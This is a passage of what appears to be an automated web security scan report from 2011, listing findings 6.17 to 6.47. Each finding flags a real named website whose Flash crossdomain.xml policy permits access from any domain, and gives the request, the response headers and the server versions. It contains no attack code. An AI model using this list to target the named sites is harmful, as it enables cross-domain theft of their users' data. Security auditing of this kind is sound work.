<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.17. http://www.bacardimojito.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bacardimojito.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bacardimojito.com

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Thu, 14 Jun 2007 21:03:33 GMT
Accept-Ranges: bytes
ETag: "7c68ae77c7aec71:5897"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AWS: 06
Date: Wed, 04 May 2011 00:52:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.18. http://www.barafranca.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barafranca.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barafranca.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:32:47 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 212
Last-Modified: Fri, 18 Feb 2011 09:17:13 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

6.19. http://www.bestvehicle4you.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bestvehicle4you.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bestvehicle4you.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 04 May 2011 01:09:24 GMT
Content-Type: text/xml
Content-Length: 295
Last-Modified: Wed, 13 Apr 2011 23:14:28 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.20. http://www.bluestraveler.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluestraveler.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bluestraveler.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 12 Apr 2010 22:06:19 GMT
ETag: "971d9f-13e-484115ac4ccc0"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from to-ports="443" secure="false" domain="app.topspin.net"/>
<allow-access-from secure="false" domain="*.macromedia.com"/>
<allow-access-from secure="false" domain="*.adobe.com"/>
...[SNIP]...

6.21. http://www.bodybymilk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bodybymilk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bodybymilk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:49:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 03 Aug 2010 21:05:52 GMT
ETag: "6201db-d8-48cf1aea68c00"
Accept-Ranges: bytes
Content-Length: 216
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" secure="false" /></cros
...[SNIP]...

6.22. http://www.booster-ads.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booster-ads.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.booster-ads.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:01:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 01 Sep 2010 00:43:57 GMT
ETag: "c9af1-c3-48f27fe224d40"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.23. http://www.box24casino.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.box24casino.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.box24casino.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:18 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 15:07:51 GMT
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
   <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
        <allow-access-from domain="*" />
       </cross-d
...[SNIP]...

6.24. http://www.bunte.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bunte.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bunte.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:25 GMT
Server: Apache
Last-Modified: Thu, 26 Nov 2009 16:19:30 GMT
Accept-Ranges: bytes
Content-Length: 79
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.25. http://www.buzzine.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buzzine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:01 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 06:18:52 GMT
ETag: "490c917-176-49306621d0b00"
Accept-Ranges: bytes
Content-Length: 374
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 00:54:01 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

6.26. http://www.chathambarsinn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chathambarsinn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chathambarsinn.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:15 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 SVN/1.4.6 PHP/5.2.4-2ubuntu5.7 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 31 Mar 2009 17:21:09 GMT
ETag: "348f0-64-4666d6cc28b40"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.27. http://www.cnet.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cnet.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cnet.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:25:44 GMT
Server: Apache
Last-Modified: Fri, 02 Jul 2010 14:35:21 GMT
ETag: "60d1d-13a-48a687f21dc40"
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

6.28. http://www.country925.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.country925.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.country925.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3189737866 3189589003
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 02:15:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:15:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.29. http://www.cpanel.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cpanel.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cpanel.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:04:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e-p1
Last-Modified: Fri, 16 Apr 2010 05:47:30 GMT
Accept-Ranges: bytes
Content-Length: 235
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 01:09:26 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       

    <cross-domain-policy>
       

    <allow-access-from domain="*" />
...[SNIP]...

6.30. http://www.cyclechaos.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cyclechaos.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cyclechaos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:41 GMT
Server: Apache
Last-Modified: Wed, 07 Jul 2010 21:01:11 GMT
ETag: "2fb80bf-168-48ad2782fb3c0"
Accept-Ranges: bytes
Content-Length: 360
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net"/>
...[SNIP]...

6.31. http://www.dailyhome.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailyhome.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyhome.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 01 Sep 2010 00:43:57 GMT
ETag: "c9af1-c3-48f27fe224d40"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.32. http://www.davincisurgery.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davincisurgery.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.davincisurgery.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:47 GMT
Server: Sun GlassFish Enterprise Server v2.1
X-Powered-By: Servlet/2.5
Last-Modified: Mon, 02 May 2011 23:49:29 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 208
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*" /><allow-access-from domain="www.davincistories.com" /><site-control permitted-cross-domain-policies="all" /></cross-domain
...[SNIP]...

6.33. http://www.dddnews.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dddnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dddnews.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 26 Apr 2012 22:16:39 GMT
Vary: Accept-Encoding
Content-Length: 199
Connection: close
Content-Type: text/plain;charset=iso-8859-1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.34. http://www.dealercrm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dealercrm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dealercrm.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8g DAV/2 PHP/5.3.3
Content-Type: application/xml
Date: Wed, 04 May 2011 02:18:28 GMT
Keep-Alive: timeout=5, max=100
Accept-Ranges: bytes
ETag: "340b06-64-450099d403080"
Connection: close
Set-Cookie: X-Mapping-lcmfminj=5A7BB605F297DFC0ADEC85AB6115BA33; path=/
Last-Modified: Thu, 19 Jun 2008 19:02:10 GMT
Content-Length: 100

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.35. http://www.dezercollection.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dezercollection.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dezercollection.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 08 Dec 2009 20:01:44 GMT
ETag: "ecd6d4-73-b0f7a00"
Accept-Ranges: bytes
Content-Length: 115
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.36. http://www.dovogame.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dovogame.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dovogame.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Wed, 04 May 2011 01:14:27 GMT
Content-Type: text/xml; charset=gb2312
Connection: close
Content-Length: 133
Last-Modified: Wed, 29 Sep 2010 09:19:21 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure="false" />
</cross-domain-policy>

6.37. http://www.egroupnet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egroupnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.egroupnet.com

Response

HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml
Last-Modified: Wed, 17 Nov 2010 19:28:00 GMT
Accept-Ranges: bytes
ETag: "9b4cb08b8d86cb1:58c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:41:44 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.egroupnet.com/crossdomain.xml -->
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http
...[SNIP]...

6.38. http://www.emol.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.emol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emol.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 21 Jul 2010 19:26:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-timeE: 1304472030
X-timeS: 1304472030
Content-Length: 119
Connection: close
EM-Cache: HIT
Age: 0
Cache-Control: max-age=300

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.39. http://www.empoweringparents.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.empoweringparents.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.empoweringparents.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.16 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Mon, 11 Apr 2011 15:56:18 GMT
ETag: "ac815c-67-4da324a2"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-policy>

6.40. http://www.everywherechat.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.everywherechat.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.everywherechat.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:21 GMT
Server: Apache/2.0.54
Last-Modified: Thu, 01 Nov 2007 02:17:00 GMT
ETag: "1686c8f-cb-a526ff00"
Accept-Ranges: bytes
Content-Length: 203
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.41. http://www.eye-make-up-tips.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.eye-make-up-tips.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eye-make-up-tips.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 15 Mar 2008 20:03:20 GMT
ETag: "778180-54-4487f473bf200"
Accept-Ranges: bytes
Content-Length: 84
Vary: User-Agent,Cookie
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.42. http://www.ezfolk.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ezfolk.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ezfolk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:08 GMT
Server: Apache
Last-Modified: Tue, 28 Apr 2009 02:02:38 GMT
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.43. http://www.financesate.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.financesate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.financesate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:19:35 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 20 Apr 2010 14:19:22 GMT
ETag: "72ec2f3-68-484abc38e4e80"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.44. http://www.flor.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.flor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:30:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Sep 2010 20:55:24 GMT
ETag: "24289e8-c6-48fc5bb818700"
Accept-Ranges: bytes
Content-Length: 198
Cache-Control: max-age=7200
Expires: Wed, 04 May 2011 05:30:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://www.funkitron.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.funkitron.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.funkitron.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:27 GMT
Server: Apache
Last-Modified: Tue, 05 Jan 2010 18:37:25 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.46. http://www.gamekult.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamekult.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gamekult.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:42 GMT
Server: Apache
Last-Modified: Mon, 01 Sep 2008 13:55:24 GMT
ETag: "b34389-d7-455d5f46cab00"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross
...[SNIP]...

6.47. http://www.georgeharrison.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.georgeharrison.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.georgeharrison.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:04 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 08 Sep 2009 20:56:59 GMT
Accept-Ranges: bytes
